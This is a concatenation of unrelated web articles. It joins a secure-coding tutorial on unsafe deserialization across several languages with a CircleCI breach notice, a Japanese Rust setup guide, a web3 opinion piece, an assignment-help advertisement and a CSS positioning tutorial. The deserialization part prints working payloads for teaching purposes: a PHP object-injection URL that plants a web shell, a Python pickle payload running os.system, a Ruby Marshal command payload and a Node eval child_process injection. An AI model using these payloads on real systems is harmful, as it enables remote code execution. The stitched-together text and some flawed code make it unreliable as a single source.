The above program merrily deserializes not only instances of SomeClass (even though a class cast error is raised for other objects), but also might be enough to trigger dangerous behaviors. For example, a malicious user could leverage publicly available tools such as ysoserial.net to easily craft payloads that exploit the presence of external libraries, and thus build a chain of gadgets that eventually lead to RCE.
Alternatively, an attacker with knowledge of the source code of the application could attempt to locate dangerous classes in the code base. For example, suppose that somewhere in the application, the following class is defined:
```
[Serializable]
public class DangerousClass
{
private string path;
public DangerousClass(String path) {
this.path = path;
}
public ~DangerousClass() {
File.Delete(path)
}
}
```
The attacker is then able to build such objects locally using an arbitrary path as a parameter, serialize it, and finally feed it to the vulnerable application. When said object is eventually removed from memory by the garbage collector, the attacker gains the ability to delete arbitrary files in the system.
## Prevention
Never pass user-supplied input to BinaryFormatter; the documentation states this explicitly:
The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they’re processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure.
When possible, developers are encouraged to use other forms of data serialization, such as XML, JSON, or the BinaryReader and BinaryWriter classes. The latter is the recommended approach for binary serialization. For example, in the above scenario, the serialization phase could be implemented as:
```
var someObject = new SomeClass();
someObject.SomeProperty = "some value";
someObject.SomeOtherProperty = 3.14;
using (BinaryWriter writer = new BinaryWriter(File.Open("untrusted.file", FileMode.Create)))
{
writer.Write(someObject.SomeProperty);
writer.Write(someObject.SomeOtherProperty);
}
```
And in turn, the deserialization phase as:
```
var someObject = new SomeClass();
using (BinaryReader reader = new BinaryReader(File.Open("untrusted.file", FileMode.Open)))
{
someObject.SomeProperty = reader.ReadString();
someObject.SomeOtherProperty = reader.ReadDouble();
}
```
## References
[OWASP - Deserialization Cheat Sheet Wikipedia - Serialization
](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#java)
[Microsoft - BinaryFormatter security guide
](https://docs.microsoft.com/en-us/dotnet/standard/serialization/binaryformatter-security-guide)
## Unsafe Deserialization in Java
Java implements serialization natively for objects that implement the Serializable interface via the ObjectInputStream and ObjectOutputStream facilities. The binary format used directly references classes by name that are eventually loaded dynamically, provided that they are in the class path. This potentially allows instantiating objects of classes not initially intended by the developer, thus it is very important that untrusted data is not deserialized as is.
Developers may customize some aspects of the serialization process by providing callbacks such as writeReplace and readResolve. This could be exploited by an attacker to build chains by building complex objects that eventually lead to code execution or other actions on the target. Especially when complex and well-known libraries and frameworks are used, attackers may leverage publicly available tools such as ysoserial to easily craft the appropriate payload.
### Vulnerable Example
The following Spring controller uses the data coming from the client request to deserialize an object:
```
@Controller
public class MyController {
@RequestMapping(value = "/", method = GET)
public String index(@CookieValue(value = "myCookie") String myCookieString) {
// decode the Base64 cookie value
byte[] myCookieBytes = Base64.getDecoder().decode(myCookieString);
// use those bytes to deserialize an object
ByteArrayInputStream buffer = new ByteArrayInputStream(myCookieBytes);
try (ObjectInputStream stream = new ObjectInputStream(buffer)) {
MyObject myObject = stream.readObject();
// ...
}
}
}
```
### Prevention
Never pass user-supplied input to the Java deserialization mechanism, and opt for data-only serialization formats such as JSON.
If the deserialization of untrusted data is really necessary, consider adopting an allow list approach to only allow objects of certain classes to be deserialized.
Since Java version 9, it has been possible to specify a deserialization filter in several ways. One example is to use the setObjectInputFilter method for ObjectInputStream objects before their use. The setObjectInputFilter method takes, as an argument, a method that implements the filtering logic. The following filter only allows one to deserialize instances of the MyClass class:
```
ObjectInputStream objectInputStream = new ObjectInputStream(buffer);
stream.setObjectInputFilter(MyFilter::myFilter);
Where:
public class MyFilter {
static ObjectInputFilter.Status myFilter(ObjectInputFilter.FilterInfo info) {
Class<?> serialClass = info.serialClass();
if (serialClass != null) {
return serialClass.getName().equals(MyClass.class.getName())
? ObjectInputFilter.Status.ALLOWED
: ObjectInputFilter.Status.REJECTED;
}
return ObjectInputFilter.Status.UNDECIDED;
}
}
```
Alternatively, it is possible to implement a similar solution by specializing the implementation of the ObjectInputStream object. The following snippet only allows one to deserialize instances of the MyClass class:
```
public class MyFilteringInputStream extends ObjectInputStream {
public MyFilteringInputStream(InputStream inputStream) throws IOException {
super(inputStream);
}
@Override
protected Class<?> resolveClass(ObjectStreamClass objectStreamClass) throws IOException, ClassNotFoundException {
if (!objectStreamClass.getName().equals(MyClass.class.getName())) {
throw new InvalidClassException("Forbidden class", objectStreamClass.getName());
}
return super.resolveClass(objectStreamClass);
}
}
```
It is then possible to invoke the deserialization in the usual way:
```
ObjectInputStream objectInputStream = new MyFilteringInputStream(buffer);
objectInputStream.readObject();
```
### References
[OWASP - Deserialization Cheat Sheet
](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#java)
[Wikipedia Serialization Oracle
](https://en.wikipedia.org/wiki/Serialization)
[Serializable Oracle
](https://docs.oracle.com/javase/7/docs/api/java/io/Serializable.html)
[Serialization Filtering
](https://docs.oracle.com/javase/10/core/serialization-filtering1.htm)
[GitHub - Ysoserial
](https://github.com/frohoff/ysoserial)
## Unsafe Deserialization in NodeJS
### Vulnerable example
Unlike PHP or Java, Node.js (JavaScript) does not provide advanced forms of object serialization, yet the JSON (JavaScript Object Notation) format is often used to convert JavaScript data object from/to a string representation. Before the relative recent addition of the JSON.parse method to ECMAScript, developers used to deserialize objects using the eval function. The following snippet illustrates this bad practice:
```
function myJSONParse(data) {
return eval(`(${data})`);
}
```
If data is controlled by the attacker, it becomes trivial to inject arbitrary JavaScript code. For example, the following invocation executes a shell script that writes the output of the id command to /tmp/proof:
```
myJSONParse("require('child_process').exec('id > /tmp/proof')"
```
### Prevention
The correct way to serialize and deserialize JavaScript objects is to use the provided JSON global object. For example:
```
const object = {foo: 123};
JSON.stringify(object) // '{"foo":123}'
JSON.parse('{"foo":123}') // { foo: 123 }
```
### References
[Wikipedia - Serialization
](https://en.wikipedia.org/wiki/Serialization)
[OWASP - OWASP Top 10:2021 Software and Data Integrity Failure
](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/)
[MDN - JSON
](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON)

## Unsafe Deserialization in PHP
PHP uses serialize() and unserialize() native functions to serialize and unserialize an object. For example, the following script creates an instance of the object FSResource, serializes it, and then prints the string representation of the object.
```
<?php
class FSResource {
function __construct($path) {
$this->path = $path;
if (file_exists($path)) {
$this->content = file_get_contents($path);
}
}
function __destruct() {
file_put_contents($this->path, $this->content);
}
}
$resource = new FSResource('/tmp/file');
print(serialize($resource));
# Prints the following string representation:
# O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}
```
The string representation can then be deserialized again to recreate the object instance and access its attributes.
```
$instance = unserialize('O:10:"FSResource":2:{s:4:"path";s:9:"/tmp/file";s:7:"content";s:0:"";}');
print($instance->path);
# Prints the path attribute:
# /tmp/file
```
### Vulnerable Example
The exploitation of deserialization in PHP is called PHP Object Injection, which happens when user-controlled input is passed as the first argument of the unserialize() function. This is a vulnerable script.php:
```
<?php
$instance = unserialize($_GET["data"]);
```
To be exploitable, the vulnerable piece of code must have enough PHP code in scope to build a working POP chain, a chain of reusable PHP code that causes a meaningful impact when invoked. The chain usually starts by triggering destroy() or wakeup() PHP magic methods, called when the object is destroyed or deserialized, in order to call other gadgets to conduct malicious actions on the system.
If the class FSResource defined in the paragrah above is in scope, an attacker could send an HTTP request containing a serialized representation of an FSResource object that creates a malicious PHP file to path with an arbitrary content when the __destruct() magic method is called upon destruction.
```
http://localhost/script.php?data=O:10:%22FSResource%22:2:{s:4:%22path%22;s:9:%22shell.php%22;s:7:%22content%22;s:27:%22%3C?php%20system($_GET[%22cmd%22]);%22;}
```
The payload above decodes as O:10:"FSResource":2:{s:4:"path";s:9:"shell.php";s:7:"content";s:27:"<?php system($_GET["cmd"]);";} and, when deserialized, it creates the shell.php allowing the attacker to run arbitrary commands on the systems. More complex payloads can be built by chaining code from multiple classes or reusing public POP chains such as the ones included in the PHPGCC projects.
### Prevention
Never use the unserialize() function on user-supplied input, and preferably use data-only serialization formats such as JSON. If you need to use PHP deserialization, a second optional parameter has been added in PHP 7 that enables you to specify an allow list of allowed classes.
### References
[Wikipedia - Serialization
](https://en.wikipedia.org/wiki/Serialization)
[PHP unserialize
](https://www.php.net/manual/en/function.unserialize.php)
[OWASP PHP Object Injection
](https://www.owasp.org/index.php/PHP_Object_Injection)
[POC 2009 - Stefan Esser Shoking news in PHP exploitation
](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
[BlackHat USA 2010 - Stefan Esser - Utilizing Code Reuse in PHP Application Exploits
](https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf)
[PHPGCC](https://github.com/ambionics/phpggc)
## Unsafe Deserialization in Python

### Vulnerable example
Python provides a native solution for this problem - the pickle library. The following Flask endpoint provides an example where untrusted data is fed into the pickle.loads function:
```
import pickle
@app.route("/import_object", methods=['POST'])
def import_object():
data = request.files.get('user_file').read()
user_object = pickle.loads(data)
store_in_database(user_object)
return 'OK'
```
A malicious user could craft a payload that evaluates as code when unpickled. The Python program below outputs a payload that executes a system command when processed by pickle.loads:
```
import pickle
import os
class Pickle(object):
def __reduce__(self):
return os.system, ('id > /tmp/proof',)
o = Pickle()
p = pickle.dumps(o)
print(p)
```
The reduce method provides the logic to unserialize/serialize the object. When a tuple is returned, the first element is a callable, and the second represents its argument. Thus, it is possible to execute system commands by using the os.system function. In the above case, the payload writes the output of the id command to /tmp/proof. Here is an example:
```
sf@secureflag.com:~$ python3 generate.py
b'\x80\x03cposix\nsystem\nq\x00X\x0f\x00\x00\x00id > /tmp/proofq\x01\x85q\x02Rq\x03.'
sf@secureflag.com:~$ python3
>>> import pickle
>>> pickle.loads(b'\x80\x03cposix\nsystem\nq\x00X\x0f\x00\x00\x00id > /tmp/proofq\x01\x85q\x02Rq\x03.')
0
sf@secureflag.com:~$ cat /tmp/proof
uid=1000(sf) gid=1000(sf) groups=1000(sf)
```
### Prevention
The pickle library’s documentation discourages the unpickling of untrusted data and suggests using data-only serialization formats such as JSON.
If you really need to unserialize content from an untrusted source, consider implementing a message authentication code (MAC) to ensure the data integrity of the payload.
### References
[OWASP - Deserialization Cheat Sheet
](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html)
[Wikipedia - Serialization
](https://en.wikipedia.org/wiki/Serialization)
## Unsafe Deserialization in Ruby

Ruby uses the Marshal library to serialize and unserialize objects. For example, the following script creates an instance of the object User, serializes it, and then prints the string representation of the object.
```
User = Struct.new(:name, :role)
user = User.new('Mike', :admin)
puts Marshal.dump(user).inspect
# Prints the following string representation:
# "\x04\bS:\tUser\a:\tnameI\"\tMike\x06:\x06ET:\trole:\nadmin"
```
The string representation can then be deserialized again to recreate the object instance and access its attributes.
```
user = Marshal.load("\x04\bS:\tUser\a:\tnameI\"\tMike\x06:\x06ET:\trole:\nadmin")
print(user.name);
# It prints the following string:
# Mike
```
### Vulnerable Example
The exploitation of deserialization in Ruby happens when user-controlled input is passed as the first argument of the Marshal.load() function.
To be exploitable, the vulnerable piece of code must have enough Ruby code in scope to build a gadget chain, which means a chain of reusable code that causes a meaningful impact when invoked.
For example, assume that Marshal.load() deserializes user-provided data. An attacker could craft a malicious payload like the following one, which abuses an existing class to execute a command when deserialized.
```
class FSResource
def initialize path
@path = path
end
def to_s
open(@path).read
end
end
# Craft the payload to execute `id` via the `open` function instead of opening a file
obj = FSResource.new('|id')
payload = Marshal.dump(obj)
# Unserializing the payload allows to execute arbitrary commands
serialized_obj = Marshal.load(payload)
puts serialized_obj
# It prints the output of id:
# uid=1002(admin) gid=1002(admin) groups=1002(admin)
```
A number of real code chains against Ruby and Ruby on Rails have been discovered and published by security researchers in the past.
### References
[Wikipedia - Serialization
](https://en.wikipedia.org/wiki/Serialization)
[Ruby - Marshal
](https://ruby-doc.org/core-2.6.3/Marshal.html)
[ZDI - Remote Code Execution via Ruby on Rails Active Storage Insecure Deserialization
](https://www.zerodayinitiative.com/blog/2019/6/20/remote-code-execution-via-ruby-on-rails-active-storage-insecure-deserialization)
[ELTTAM - Ruby 2.x Universal RCE Deserialization Gadgets Chain
](https://www.elttam.com/blog/ruby-deserialization/)
## Unsafe Deserialization in Scala
Scala (the same as Java) implements serialization natively for objects that implement the Serializable interface via the ObjectInputStream and ObjectOutputStream facilities. The binary format used directly references classes by name that are eventually loaded dynamically, provided that they are in the class path. This potentially allows instantiating objects of classes not initially intended by the developer, thus it is very important that untrusted data is not deserialized as is.
Developers may customize some aspects of the serialization process by providing callbacks such as writeReplace and readResolve. This could be exploited by an attacker to build chains by building complex objects that eventually lead to code execution or other actions on the target. Especially when complex and well-known libraries and frameworks are used, attackers may leverage publicly available tools such as ysoserial to easily craft the appropriate payload.
### Vulnerable Example
The following Play controller uses the data coming from the client request to deserialize an object:
```
def handler() =
AuthAction(parse.multipartFormData) { implicit request => {
request.body.file("file") match {
case Some(file) => {
// deserialize data from Base64 file upload
val base64Data = new String(Files.readAllBytes(Paths.get(file.ref.path.toString()))).trim()
val data = Base64.getDecoder().decode(base64Data)
val ois = new ObjectInputStream(new ByteArrayInputStream(data))
val object = ois.readObject().asInstanceOf[MyClass]
ois.close()
// ...
}
case None => InternalServerError("...")
}
}
}
```
### Prevention
Never pass user-supplied input to the Scala deserialization mechanism, and opt for data-only serialization formats such as JSON.
If the deserialization of untrusted data is really necessary, consider adopting an allow list approach to only allow objects of certain classes to be deserialized.
It is possible to specialize the implementation of the ObjectInputStream object. The following snippet only allows one to deserialize instances of the MyClass class:
```
class SafeInputStream(inputStream: InputStream) extends ObjectInputStream(inputStream) {
override def resolveClass(objectStreamClass: java.io.ObjectStreamClass): Class[_] = {
objectStreamClass.getName match {
case "MyClass" | "scala.Some" | "scala.Option" => super.resolveClass(objectStreamClass)
case _ => throw new InvalidClassException("Forbidden class", objectStreamClass.getName)
}
}
}
```
It is then possible to invoke the deserialization in the usual way:
```
val ois = new SafeInputStream(new ByteArrayInputStream(data))
val object = ois.readObject().asInstanceOf[MyClass]
```
## References
[OWASP - Deserialization Cheat Sheet
](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#java)
[Wikipedia - Serialization
](https://en.wikipedia.org/wiki/Serialization)
[Oracle - Serializable
](https://docs.oracle.com/javase/7/docs/api/java/io/Serializable.html)
[Oracle - Serialization Filtering
](https://docs.oracle.com/javase/10/core/serialization-filtering1.htm)
[GitHub - Ysoserial
](https://github.com/frohoff/ysoserial)
---
Source :- https://tutorialboy24.blogspot.com/2022/12/an-unsafe-deserialization-vulnerability.html | tutorialboy | |
1,318,252 | Rotate your Circle CI keys now. | This morning many developers recieved an email informing them that circle CI had been breached... | 0 | 2023-01-05T10:54:52 | https://dev.to/lukeecart/rotate-your-circle-ci-keys-now-3b14 | devops, news | This morning many developers recieved an email informing them that circle CI had been breached between 21st December 2022 and 4th January 2023.

Image from [https://www.bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/circleci-warns-of-security-breach-rotate-your-secrets/)
### Am I affected?
The statement says:
> "At this point, **we are confident that there are no unauthorized actors** active in our systems; however, out of an **abundance of caution**, we want to ensure that all customers take certain preventative measures to protect your data as well."
### What do I need to do?
The recommendation is to '**Immediately rotate any and all secrets stored in CircleCI**. These may be stored in project environment variables or in contexts.'
This includes SSH keys and other secrets.
### How do I rotate my keys?
To rotate keys please refer to this documentaion on circle ci's website - [https://circleci.com/docs/managing-api-tokens/#rotating-a-project-api-token](https://circleci.com/docs/managing-api-tokens/#rotating-a-project-api-token)
### Do you have any questions?
Please see this tweet from circle ci to some common questions- [Tweet about common questions being answered by a circle ci engineer](https://twitter.com/CircleCI/status/1610893135235661830?cxt=HHwWjICyjbGxhdssAAAA)
Or add a question to the [circle ci discussion board](https://discuss.circleci.com/t/circleci-security-alert-rotate-any-secrets-stored-in-circleci/46479)
# References:
- **CircleCI security alert** [https://circleci.com/blog/january-4-2023-security-alert/](https://circleci.com/blog/january-4-2023-security-alert/)
- **Circle CI twitter account** [https://twitter.com/CircleCI](https://twitter.com/CircleCI)
- Article about circle CI [https://www.bleepingcomputer.com/news/security/circleci-warns-of-security-breach-rotate-your-secrets/](https://www.bleepingcomputer.com/news/security/circleci-warns-of-security-breach-rotate-your-secrets/)
| lukeecart |
1,320,448 | Rust on Arch Linux: 始め方 | はじめに Rust (あるいは rustlang) はモダンな汎用プログラミング言語の一つです。高速で、安全で、開発生産性を備えています。 Rust... | 21,290 | 2023-01-07T02:35:09 | https://scqr.net/ja/blog/2023/01/07/rust-on-arch-linux-getting-started/index.html | rust, rustup, cargo, archlinux | ## はじめに
[Rust](https://www.rust-lang.org/) (あるいは rustlang) はモダンな汎用プログラミング言語の一つです。高速で、安全で、開発生産性を備えています。
Rust にはたくさんの特徴があります。例えば [関数型プログラミング (英語)](https://doc.rust-lang.org/book/ch13-00-functional-features.html) パラダイムや、[所有権 (英語)](https://doc.rust-lang.org/book/ch04-01-what-is-ownership.html)、[ゼロコスト抽象化 (英語)](https://doc.rust-lang.org/stable/embedded-book/static-guarantees/zero-cost-abstractions.html) (!) などです。速度と安全性について言うと、GC すなわちガベージ・コレクションがありません。そのため非常に少ないメモリで動作し、ゴミを残しません。生産性について言うと、[cargo](https://doc.rust-lang.org/cargo/) というよくできたパッケージ・マネージャーがあり、さらに [rustup](https://rustup.rs/) という[ツールチェイン (英語)](https://rust-lang.github.io/rustup/concepts/toolchains.html) (stable / beta / nightly と複数に分かれたリリースチャネル) に対応したインストーラーがあります。
Rust はクロス・プラットフォームに対応しています。単一のコードベースから、さまざまなプラットフォームで動作するようにコンパイルできます。さらに出力が単体のバイナリになるので、ファイルサイズは最適化されておりそれゆえ小さいです。ここにおいて Rust のさらなる特徴が挙げることができます。すなわちポータビリティです。
サポートされているプラットフォームですが、まず Windows / Mac / Linux です。(Tier 1) そしてそれだけにとどまらず FreeBSD (Tier 2) や OpenBSD (Tier 3) も含まれます。
Tier とは何でしょうか ? Rust の [プラットフォームのサポートモデル (英語)](https://doc.rust-lang.org/rustc/platform-support.html) に関わるものです。3 つの層から成ります。
| Tier | 説明 |
| ----- | ----------- |
| 1 | "動作の保証" (公式バイナリのビルドプロセスで、テストまで自動化されています) |
| 2 | "ビルドの保証" (ビルドの自動化と、テストの一部自動化) |
| 3 | 正常動作しない可能性あり (コードベースとしてはサポートされていますが、ビルドとテストの自動化はされていません) |
64 ビット Linux (kernel 3.2+, glibc 2.17+) は、Tier 1 です。最も厚くサポートされているカテゴリです !!
本記事では Rust を [Artix Linux](https://artixlinux.org/) という [Arch Linux](https://archlinux.org/) 由来の OS にインストールする方法を紹介します。
### 環境
- OS: Artix Linux (Arch Linux 由来)
- App: Rust [1.66.0](https://releases.rs/docs/1.66.0/)
- App toolchains installer: rustup 1.25.1
- ターミナル: [Xfce4 Terminal](https://gitlab.xfce.org/apps/xfce4-terminal)
- IDE (& エディター): [VSCodium](https://vscodium.com/) (あるいは [VS Code](https://code.visualstudio.com/))
## チュートリアル
各所の [`doas`](https://man.openbsd.org/doas) は [`sudo`](https://www.sudo.ws/) に置き換えることができます。
### インストール
[pacman](https://wiki.archlinux.org/title/Pacman) を使用する場合でも、少なくとも 2 つの選択肢があります。
1. Rust の直接インストール
2. rustup をインストールして stable チャネルの環境を構築する方法
後者の方法が公式に推奨されています。とは言え必ずしもというわけではありません。お試しで前者の方法を採って時短することも可能です。
いずれの方法についても以下に示します。ターミナルを開いて始めましょう。
#### Rust の直接インストール (選択肢 1)
```console
$ doas pacman -Sy rust
```
#### rustup のインストール (選択肢 2)
```console
$ doas pacman -Sy rustup
```
続いて以下を実行します。
```console
$ rustup default stable
```
出力は以下の通りでした:
```console
info: syncing channel updates for 'stable-x86_64-unknown-linux-gnu'
info: latest update on 2022-12-15, rust version 1.66.0 (69f9c33d7 2022-12-12)
info: downloading component 'cargo'
info: downloading component 'clippy'
info: downloading component 'rust-docs'
info: downloading component 'rust-std'
info: downloading component 'rustc'
68.0 MiB / 68.0 MiB (100 %) 22.9 MiB/s in 2s ETA: 0s
info: downloading component 'rustfmt'
info: installing component 'cargo'
info: installing component 'clippy'
info: installing component 'rust-docs'
19.0 MiB / 19.0 MiB (100 %) 15.3 MiB/s in 1s ETA: 0s
info: installing component 'rust-std'
29.7 MiB / 29.7 MiB (100 %) 17.4 MiB/s in 1s ETA: 0s
info: installing component 'rustc'
68.0 MiB / 68.0 MiB (100 %) 19.7 MiB/s in 3s ETA: 0s
info: installing component 'rustfmt'
info: default toolchain set to 'stable-x86_64-unknown-linux-gnu'
stable-x86_64-unknown-linux-gnu installed - rustc 1.66.0 (69f9c33d7 2022-12-12)
```
完了です 😉
余談ですが rustup を使うと、stable の代わりに、nightly もしくは beta 版の環境を入れることもできます。それらの方が、コンパイルタイムが短縮されていたり、充実した (しかしながらおそらくはテスト中の) 機能を使える場合があります。
### プロジェクトの作成
最初にディレクトリをつくります。
```console
$ mkdir my-first-rust-prj
$ cd my-first-rust-prj
```
次に VSCodium を (あるいは VS Code を) そのディレクトリで立ち上げます。
キーボードの `Ctrl + Shift + @` を押して、ターミナルを開きましょう。

[`cargo init`](https://doc.rust-lang.org/cargo/commands/cargo-init.html) を実行します。すると cargo のパッケージが生成されます:
```console
$ cargo init --bin .
```
なお `--bin` オプションはデフォルトの挙動に該当するので、省略しても大丈夫です。
出力は以下の通りでした:
```
Created binary (application) package
```
次のようなものたちができているはずです。`Cargo.toml`、これはプロジェクトのマニフェスト定義、`Cargo.lock`、こちらは依存パッケージのロックファイル、それから `src/main.rs` というプログラムのエントリになるもの、などなど。さらに [`cargo build`](https://doc.rust-lang.org/cargo/commands/cargo-build.html) を実行すると、`target` というディレクトリが生成されます。
```
.
├─.gitignore
├─src
├───main.rs
├─Cargo.lock
└─Cargo.toml
```
### デモアプリの実行
コンパイルできるセットが手に入りました。
実際にコンパイルしてアプリとして実行するには、どうすれば良いのでしょうか ? こちらを実行するだけです:
```console
$ cargo run
```
出力は以下の通りでした:
```console
Compiling my-first-rust-prj v0.1.0 (/(...)/my-first-rust-prj)
Finished dev [unoptimized + debuginfo] target(s) in 0.26s
Running `target/debug/my-first-rust-prj`
Hello, world!
```
やりました。"Hello, world!" と出力されました。すばらしいですね :)
別のやり方として、バイナリを生成して、それを手動で実行することもできます。
```console
$ cargo build
Finished dev [unoptimized + debuginfo] target(s) in 0.00s
$ ./target/debug/my-first-rust-prj
Hello, world!
```
## おわりに
さあ Rust プロジェクトのこと始めができました。すぐにでも開発を始められます。
データ加工、ファイル I/O の実装、ネットワーク接続の制御、サーバー構築、などなど。
Rust との旅をお楽しみください -- 安全で、強力で、おもしろくて、堅牢で、魅力的なものになるでしょう。
良い旅を ;)
### 参考
- [The Rust Programming Language (英語)](https://doc.rust-lang.org/stable/book)
- 本当に良い本です !!
- [Learn Rust (英語)](https://www.rust-lang.org/learn)
| nabbisen |
1,322,291 | Hire Affordable Engineering Assignment Helper In the USA | Excellent Advantages of our Engineering assignment help services Students from around the globe can... | 0 | 2023-01-09T09:46:40 | https://dev.to/jaccymice/hire-affordable-engineering-assignment-helper-in-the-usa-3n03 | webdev | Excellent Advantages of our Engineering assignment help services
Students from around the globe can use our engineering assignment help online. Thousands of students rely on our support when it comes to finishing their academic work because we have been in this sector for a very long time and are aware of the crucial variables that must be taken into account when writing your assignment. We have consistently been able to deliver top-notch content that helps students in achieving good marks by expectations.But what's the best thing, do you know? With our [Online Engineering Assignment Help](https://www.assignmenthelppro.com/us/engineering-assignment-help/) in the USA, we also give our customers access to special benefits and services!
On-time delivery: We never miss deadlines because we know how important it is for you to turn in your work by the specified date. So, as soon as we receive your order, our team of USA-based Engineering Assignment Helpers will get to work.
Plagiarism-free content:Content that is free of plagiarism will be written by us entirely from scratch. Our team constantly ensures that your project is completely free of plagiarism. If you would like, we can also give you a data report that is free of plagiarism.
Affordable prices: A student's budget is quite tight. We are aware of this! Because of this, our engineering assignment help services provide help at a very affordable price with additional discounts that students can take advantage of as needed.
24/7 customer support: You don't have to worry when contacting our team of engineering assignment helpers in the USA because we are accessible 24/7. This implies that our experts will provide you with prompt answers to all of your questions.
| jaccymice |
1,324,716 | Why You Should Not Learn Web3 As A Beginner | There are a few reasons why someone who is just starting to learn about programming and web... | 0 | 2023-01-11T07:02:09 | https://dev.to/shoyeb001/why-you-should-not-learn-web3-as-a-beginner-4f1k | beginners, web3, webdev, career | There are a few reasons why someone who is just starting to learn about programming and web development may not want to immediately dive into learning about **web3 and blockchain technology**.
### New Technology
Web3 and blockchain are relatively new and rapidly evolving technologies. This means that there is a lot of uncertainty and change in the ecosystem, which can make it difficult to know what to learn and where to focus your efforts. Additionally, the technology is still evolving and many of the use cases for it are not yet fully realized, which can make it difficult to see the practical applications of what you are learning.
### Complex For Beginners
Web3 and blockchain development can be quite complex and difficult to understand for beginners. These technologies involve advanced concepts such as cryptography, decentralized networks, and smart contracts, which can be challenging to grasp without prior knowledge and experience. Additionally, because these technologies are new and evolving, there may not be as many resources and tutorials available to help beginners learn the basics.
### Fundamental Concepts
If you are just starting to learn programming, it may be more beneficial to focus on more fundamental concepts and skills before diving into web3 and blockchain development. By learning the basics of programming languages such as JavaScript, Python, or Java, you will be building a strong foundation that will serve you well as you continue to learn and grow as a developer.
### Less Job Market
It's also worth noting that the job market for web3 and blockchain developers is still relatively small and niche. While the demand for these skills is increasing, it's not yet clear how the market will evolve and mature. As a beginner, it may be more beneficial to focus on learning web development skills that are more in demand, such as full-stack JavaScript or Java development. This will give you a better chance of finding a job and building a career in the short-term.
### Decentralize Concepts
One of the important thing is about web3 is that it require a good understanding of the concept of decentralization, and how it works, this is not something easy to grasp for beginner developer, and need a lot of time to get familiar with, it may be a good idea to first learn more about the general concepts of decentralization, distributed systems, and consensus algorithms before diving into the specifics of web3 and blockchain development.
### Conclusion
While web3 and blockchain technology have a lot of potential and are exciting to learn about, as a beginner, it may not be the best idea to immediately dive into learning about them. It may be more beneficial to focus on building a solid foundation in programming and web development, and to gain a better understanding of the concepts of decentralization before diving into more specialized and complex technologies like web3 and blockchain.
It's important to keep in mind that it's not a must to learn web3 and blockchain, it's just one of the many technologies out there, and there is always something new and interesting to learn, it's up to you to find the area that interest you the most and focus on that. | shoyeb001 |
1,325,431 | Applying CSS Positioning Properties | In this article, you’ll learn what CSS positioning properties are, the different CSS positioning property values, and how you can apply them to your web page. | 0 | 2023-01-11T16:31:13 | https://code.pieces.app/blog/applying-css-positioning-properties | css | <figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/csspositionproperty_0f78273793e3918dd872670f22199887.jpg" alt="Applying CSS Positioning Properties."/></figure>
CSS positioning properties enhance the user experience on your page. Also, they allow you to position elements and contents on a web page differently. In this article, you’ll learn what CSS positioning properties are, the different CSS position property values, and how you can apply them to your web page.
## What is the Position Property in CSS?
The CSS position property describes the type of positioning method used for an element and its placement on a web page. It helps you explicitly set a location, allowing you to move your elements around on the page. In addition, you can use the top, left, right, and bottom properties to give the document any look you want. For example, properties can place elements at the edge of the parent element or the viewport edge when the value of 0 is applied.
## Why Use CSS Positioning?
We use positioning properties in CSS for many reasons:
- To enhance your design skills and improve the user experience on your page
- To specify where an element is displayed on the page
- To give the [design layout a compelling visual appeal](https://code.pieces.app/blog/using-css-flexbox-in-building-layouts)
- To enable you to exploit a component's location, allowing you to move your piece around the page
- To make your design more accessible and understandable
- To let you determine the final area of the element
## How to Use Position Property in CSS
Before diving into this topic, you should realize that even without CSS, your HTML element already has predefined rules on how it should be displayed on a web page. Therefore, it’s important to understand how things are positioned by default before changing or bending them at will. Also, bear in mind that all HTML elements are static by default. Here is how the CSS positioning property works:
- The position property in CSS helps specify elements' positions on a web page.
- Whether it will appear within the normal flow of a document or not all depends on the order.
- The CSS positioning property works with the box offset properties `left`, `right`, `top`, and `bottom`, which describe the final position of elements by moving them in different directions.
- Depending on your CSS position property values, the box offset properties must be placed first for the CSS position properties to work.
## CSS Positioning Property Values
The CSS positioning property has several values that influence how it works. These include the following:
### Static Position
[Static positioning](https://developer.mozilla.org/en-US/docs/Web/CSS/position) exists in the normal flow of the page and rejects any box offset property; it is a default position. However, the `top`, `bottom`, `left`, and `right` properties do not affect it. Note that an element with static positioning does not have a unique position. Instead, it is always set according to the normal flow of the page.
All HTML elements are static by default. Using this position, you cannot change the placement of elements on a page.
Let’s look at this example of a single `div` element with a static position:
**Example:**
```
<!DOCTYPE html>
<html>
<head>
<style>
body {
background-color: #73AD21;
}
.box {
width: 400px;
height: 200px;
background-color: white;
}
</style>
</head>
<body>
<div class="box"></div>
</body>
</html>
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=871f4db05c)
Here is the result of the above code:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image11_7a56ddfed6d62ccb6073434483d766eb.png" alt="White rectangle in the upper left corner of a large green rectangle."/></figure>
Now, let's try to move it around with the left property:
```
.box {
width: 400px;
height: 200px;
background-color: white;
position: static;
left: 70px;
}
```
[Save this code](https://user-96a93fbe-468f-4504-b52f-78e91ab5ec81-agyqaaz4hq-uc.a.run.app/?p=4b4f468499)
Here is the result of the above:
<figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/image11_246d95e27620e14f55e4fa18d722c9cb.png" alt="White rectangle in the upper left corner of a larger green rectangle."/></figure>
Notice that there is no difference in the image. Static positioning is not affected by the `top`, `bottom`, `left`, and `right` properties.
### CSS Relative Position
